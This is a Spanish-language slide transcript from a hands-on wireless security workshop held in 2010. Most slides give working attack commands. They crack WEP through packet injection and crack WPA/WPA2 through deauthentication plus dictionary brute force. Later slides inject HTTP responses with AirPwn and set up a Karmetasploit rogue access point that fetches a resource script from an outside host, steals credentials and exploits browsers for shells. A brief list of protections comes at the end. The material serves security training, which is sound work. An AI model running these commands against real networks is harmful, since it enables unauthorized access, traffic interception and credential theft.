workshop seguridad wireless

60
Workshop Seguridad Inalámbrica Jaime Andrés Restrepo

Upload: jaime-restrepo

Post on 03-Jul-2015

17.245 views

Category:

Technology


0 download

DESCRIPTION

Taller altamente practico, dictado por Jaime Andres Restrepo (DragonJAR), para asistentes al iSummit Loxa 2010, sobre seguridad en redes inalambricas.

TRANSCRIPT

Page 1: Workshop Seguridad Wireless

Workshop Seguridad Inalámbrica

Jaime Andrés Restrepo

Page 2: Workshop Seguridad Wireless

Agenda del Workshop

• ¿Cuál es tu SSID?

• ¿Porqué el WorkShop?

• ¿Como vamos a trabajar?

• Manos a la Obra!!

Page 3: Workshop Seguridad Wireless

¿Cuál es tu SSID?

Jaime

Andrés

María

Valentina

Jairo ……

Page 4: Workshop Seguridad Wireless

¿Por que el Workshop? •  Gran porcentaje de implementaciones

inalámbricas.

•  Poco interés por la seguridad en redes inalámbricas, en entornos caseros y empresariales.

•  Desconocimiento de los problemas de seguridad en redes inalámbricas

Page 5: Workshop Seguridad Wireless

¿Cómo vamos a Trabajar?

•  GRUPO II ���SSID: (WEP-II, WEP-ST-II, WPA-II, WPA2-II) ���Mac: F0:7D:68:52:AA:07

•  GRUPO I ���SSID: (WEP, WEP-ST, WPA, WPA2) ���Mac: 00:1B:11:3A:B6:9D

Page 6: Workshop Seguridad Wireless

Manos a la obra!! •  Inicia la maquina virtual o

introduce el DVD

•  Ingresa el usuario root y clave toor, luego startx

•  Conecta la memoria Wireless USB, si la tienes.

Si no tienes una tarjeta compatible.. No te preocupes

Page 7: Workshop Seguridad Wireless

WEP

Page 8: Workshop Seguridad Wireless

start-network

iwconfig

Iniciando la red y configurando la

tarjeta

Page 9: Workshop Seguridad Wireless

airmon-ng start wlan0

Ponemos nuestra tarjeta inalámbrica en modo monitor.

Page 10: Workshop Seguridad Wireless

airodump-ng mon0

Iniciamos una captura general de

trafico, para identificar las redes

activas a las que tenemos alcance.

Page 11: Workshop Seguridad Wireless

Con los resultados del comando anterior, podemos identificar varias redes e información que será muy importante para poder descifrar la clave de la red inalámbrica.

Page 12: Workshop Seguridad Wireless

airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE mon0

Ponemos nuestra tarjeta inalámbrica a

capturar la información

especifica que nos interesa, de la red

inalámbrica que seleccionamos

anteriormente.

Page 13: Workshop Seguridad Wireless

Iniciamos la captura y podemos ver los usuarios conectados, cuantos paquetes ha enviado y capturamos esos paquetes en el archivo WEP.cap

Page 14: Workshop Seguridad Wireless

aircrack-ng WEP-01.cap

Ejecutamos el aircrack para sacar la

clave de la red, que se encuentra en los

paquetes que capturamos

anteriormente.

Page 15: Workshop Seguridad Wireless

Clave: weppw

Clave en HEXA

Page 16: Workshop Seguridad Wireless

En la anterior captura, es en un entorno donde hay clientes conectados y

haciendo uso de la red.

Pero… ¿y si no hay trafico?

Page 17: Workshop Seguridad Wireless

Identificamos la red que deseamos

auditar y obtenemos la información que

será importante para poder descifrar

la clave de la red inalámbrica.

Page 18: Workshop Seguridad Wireless

Si hay clientes pero no hay trafico

Pocos datos

Identificamos un cliente conectado a la red, pero no esta

navegando y no conseguimos muchos

datos.

Page 19: Workshop Seguridad Wireless

Pocos datos y solo 12 IVs (vector de inicialización), necesitaremos al menos 5000

Intentamos crackear la clave con los pocos

paquetes que logramos conseguir y

nos dice que necesitamos muchos

mas paquetes ¿Qué hacemos?

Page 20: Workshop Seguridad Wireless

airodump-ng -c 6 --bssid MACROUTER -w WEP-ST mon0

Como el cliente que tenemos conectado

a la red, no esta navegando, vamos a

capturar algún paquete que envié el cliente, suplantarlo y

reenviarlo muchas veces trafico al

router.

aireplay-ng -3 -b MACROUTER -h MACCLIENTE mon0

Page 21: Workshop Seguridad Wireless

Logramos una buena cantidad de datos

Conseguimos capturar un paquete

del cliente y repetirlo muchas

veces para generar trafico suplantando

el cliente legitimo ante el router.

Paquetes que inyectamos

Page 22: Workshop Seguridad Wireless

28059 IVs, contra 12 que teníamos….

Después de inyectar todos esos

paquetes, ya contamos con los

suficientes vectores para crackear la clave como ya lo

hicimos anteriormente.

aircrack-ng WEP-ST-01.cap

Page 23: Workshop Seguridad Wireless

¿Puedo automatizar todos estos procesos?

Page 24: Workshop Seguridad Wireless

cd /pentest/wepbuster/ ./wepbuster

Wesside-ng –i mon0

WepBuster – Wesside-NG

Page 25: Workshop Seguridad Wireless

WPA

Page 26: Workshop Seguridad Wireless

airodump-ng mon0

Iniciamos una captura general de

trafico, para identificar las redes

WPA activas a las que tenemos

alcance.

Page 27: Workshop Seguridad Wireless

Ponemos nuestra tarjeta inalámbrica a

capturar la información

especifica que nos interesa, de la red

inalámbrica que seleccionamos

anteriormente.

airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE mon0

Page 28: Workshop Seguridad Wireless

Iniciamos la captura y

podemos ver los usuarios

conectados, cuantos paquetes

ha enviado y capturamos esos

paquetes en el archivo WPA.cap

Page 29: Workshop Seguridad Wireless

Tenemos muy buenos datos, pero…

Al ejecutar aircrack-ng WPA-01.cap, nos encontramos con 0 handshake

Como WPA se crackea, por

fuerza bruta y no descifrando la

clave como WEP, no nos importa los

datos sino el “apretón de

manos” inicial entre el pc y el

router (handshake)

Page 30: Workshop Seguridad Wireless

Ponemos a capturar…

airepaly-ng -0 1 –a MACROUTER –c MACCLIENTE mon0

En esta ocasión lo que nos importa es

capturar por la el “apretón de manos”

donde se ponen de acuerdo cliente y

servidor de la forma en que trabajaran,

esta información la usaremos para

crackear la clave wifi por fuerza bruta.

Page 31: Workshop Seguridad Wireless

aircrack-ng WPA-01.cap

Lanzamos el aircrack a el archivo .cap

generado, para verificar que

efectivamente contemos con el

handshake (apretón de

manos) y podemos empezar a lanzar

el ataque de fuerza bruta.

Page 32: Workshop Seguridad Wireless

aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b 00:1B:3A:B6:9D WPA-01.cap

Lanzamos el ataque de fuerza

bruta con el diccionario que

trae incorporado el backtrack y

esperamos que alguna de las claves

que estén en el, sea la del router.

Page 33: Workshop Seguridad Wireless

Después de casi 14 minutos, obtenemos la clave del router, que en este caso era !n5en5!7!v!7y

KEY FOUND!, encontramos la

clave de la red WPA, después ya

que afortunadamente

estaba en el diccionario de password que

utilizamos.

Page 34: Workshop Seguridad Wireless

WPA2 ���básicamente lo mismo que WPA

Page 35: Workshop Seguridad Wireless

airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE

mon0

airodump-ng mon0

airepaly-ng -0 1 –a MACROUTER –c

MACCLIENTE mon0

Page 36: Workshop Seguridad Wireless

aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst -b 00:1B:

11:3A:B6:9D WPA2-01.cap

Paramos el ataque de des autenticación y

verificamos que tenemos el handshake

Iniciamos el crackeo de la contraseña por fuerza bruta

Page 37: Workshop Seguridad Wireless

Después de casi 2 horas, obtenemos la clave del router, que en este caso era ecuatoriano

KEY FOUND!, encontramos la

clave de la red WPA2, ya que

afortunadamente estaba en el

diccionario de password que

utilizamos.

Page 38: Workshop Seguridad Wireless

¿Puedo automatizar todos estos procesos?

Page 39: Workshop Seguridad Wireless

WiFite Consola GUI

http://code.google.com/p/wifite/

Page 40: Workshop Seguridad Wireless

Que hago después de entrar a la red…

Page 41: Workshop Seguridad Wireless

vacío

admin

Page 42: Workshop Seguridad Wireless

www.routerpasswords.com

Page 43: Workshop Seguridad Wireless

Pero también podemos… •  Escanear la red en busca de equipos con

información o vulnerables.

•  Lanzar un ataque ARP Spoofing para capturar los datos que corren por esa red inalámbrica.

•  Usar su infraestructura, impresoras, conexión a internet y aplicaciones locales.

•  Cualquier otra cosa que se nos ocurra…

Page 44: Workshop Seguridad Wireless

EXTRAS

Page 45: Workshop Seguridad Wireless

AirPwn

Page 46: Workshop Seguridad Wireless

airpwn

Framework wireless que

permite inyectar paquetes

entrantes, que encajen con un

patrón que definamos en el

archivo de configuración.

Page 47: Workshop Seguridad Wireless

airpwn –d DRIVER –i mon0 –k CLAVEWEPHEXA –c

CONFIGURACION –vvv -F

Iniciamos la herramienta con

una configuración personalizada que

nos permitirá reemplazar

cualquier petición HTTP del cliente

por la nuestra.

Page 48: Workshop Seguridad Wireless

Ataque en ejecución.

Resultado del ataque

Page 49: Workshop Seguridad Wireless

Karmetasploit

Page 50: Workshop Seguridad Wireless

airmon-ng start wlan0

Airbase-ng –P –C 30 –e ^”WPA” –v mon0

Ponemos nuestra tarjeta en modo

monitor e iniciamos un

accesspoint con un essid conocido…

Page 51: Workshop Seguridad Wireless

nano /etc/dhcp3/dhcpd.conf option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; }

Page 52: Workshop Seguridad Wireless

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

/etc/init.d/dhcp3-server start

Page 53: Workshop Seguridad Wireless

wget http://digitaloffense.net/tools/karma.rc

./msfconsole –r karma.rc

Descargamos el karmetasploit de

la pagina oficial, lo ejecutamos y

esperamos que cargue

completamente

Page 54: Workshop Seguridad Wireless

Oye tu eres mi

red?

Claro yo soy tu red

Comunícame por fa con

pop.hotmail.com

Yo soy pop.hotmail.com,

¿cual es tu usuario y clave?

Mi usuario es inocencia y mi clave 123456

Muchas gracias inocencia, espera yo

verifico tus datos

Atacante Victima

Page 55: Workshop Seguridad Wireless

El resultado que veremos en los clientes que se conecten a nuestro falso access point, depende de los servicios que le solicite el cliente al karmetasploit. Si solicita un cliente pop3,ftp,dns,smb, simula ser uno y almacena los datos que proporcione el cliente en la base de datos karma.db Si hacemos una petición http en cambio nos ejecuta el modulo browser_autopwn del metasploit, para tratar de explotar alguna vulnerabilidad en nuestro navegador y conseguir una shell en el sistema.

Page 56: Workshop Seguridad Wireless

¿Como nos protegemos?

Page 57: Workshop Seguridad Wireless

¿Como podemos protégenos? •  Cambiar clave por defecto y SSID

(preferiblemente ocúltelo) al router

•  Usar WPA o WPA2 con clave fuerte.

•  Realizar Filtrado por Mac y limitar el numero de conexiones

•  Bajar la potencia a nuestro router

•  Apagar el router cuando no���se utilice

•  Usar pintura DefendAir

Page 58: Workshop Seguridad Wireless
Page 59: Workshop Seguridad Wireless

Cifrado: ???

Cifrado: ???

Cifrado: ???

Page 60: Workshop Seguridad Wireless